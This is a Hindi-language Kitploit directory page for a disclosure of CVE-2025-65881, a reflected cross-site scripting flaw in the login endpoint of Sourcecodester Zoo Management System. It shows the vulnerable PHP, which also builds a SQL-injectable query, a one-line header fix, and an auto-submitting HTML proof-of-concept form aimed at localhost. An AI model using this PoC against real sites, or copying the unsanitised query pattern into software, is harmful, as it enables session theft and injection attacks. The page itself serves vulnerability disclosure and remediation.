Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-65881 — Sourcecodester Zoo Management System v1.0 /classes/Login.php में Cross Site Scripting (XSS) के लिए संवेदनशील है, अमान्य Content-Type के कारण | Kitploit
उपकरण/GitHubGitHub/mmakingdom/cve-2025-65881
भेद्यता विश्लेषणकोड विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmmakingdom/cve-2025-65881

CVE-2025-65881

Sourcecodester Zoo Management System v1.0 /classes/Login.php में Cross Site Scripting (XSS) के लिए संवेदनशील है, अमान्य Content-Type के कारण

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-65881

परियोजना Zoo Management System v1.00 /zms/classes/Login.php?f=login पर क्रॉस-साइट स्क्रिप्टिंग (XSS) के लिए असुरक्षित है, निम्नलिखित कारणों से:

  1. /zms/classes/Login.php?f=login पर JSON प्रतिक्रियाओं का अमान्य Content-type
  2. प्रतिक्रियाओं में अस्वच्छित उपयोगकर्ता इनपुट

जिससे अप्रमाणित हमलावर दुर्भावनापूर्ण HTML/JS इंजेक्ट कर सकते हैं जो पीड़ित के ब्राउज़र में निष्पादित होता है।

प्रभावित फ़ाइल और असुरक्षित कोड

/zms/classes/Login.php

root@kitploit:~
return json_encode(array(
    'status' => 'incorrect',
    'last_qry' => "SELECT * from users where username = '$username' and password = md5('$password') "
));

मुख्य कारण

  1. एंडपॉइंट नहीं सेट करता है content type को application/json पर।
  2. $username पैरामीटर SQL क्वेरी में उपयोग करने या प्रतिक्रिया में प्रतिबिंबित होने पर स्वच्छित नहीं किया जाता है। यही दोष पहले SQL इंजेक्शन भेद्यता (CVE-2025-7160) का कारण बना।

समाधान

फ़ंक्शन login() में यह पंक्ति जोड़ें:

root@kitploit:~
public function login(){
		header('Content-Type: application/json; charset=utf-8');
		extract($_POST);

हेडर

प्रमाण-अवधारणा

root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="http://localhost/zms/classes/Login.php?f=login" method="post">
      <input type="hidden" name="username" value="awdawdawdawdawaaaa$" />
    <input type="hidden" name="password" value="awdawda" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

XSS

संदर्भ

स्रोत कोड यहाँ मुफ्त में डाउनलोड किया जा सकता है:

https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html

श्रेय

Muntadhar M. Ahmed (almuntadhar0x01)

टूल डाउनलोड करें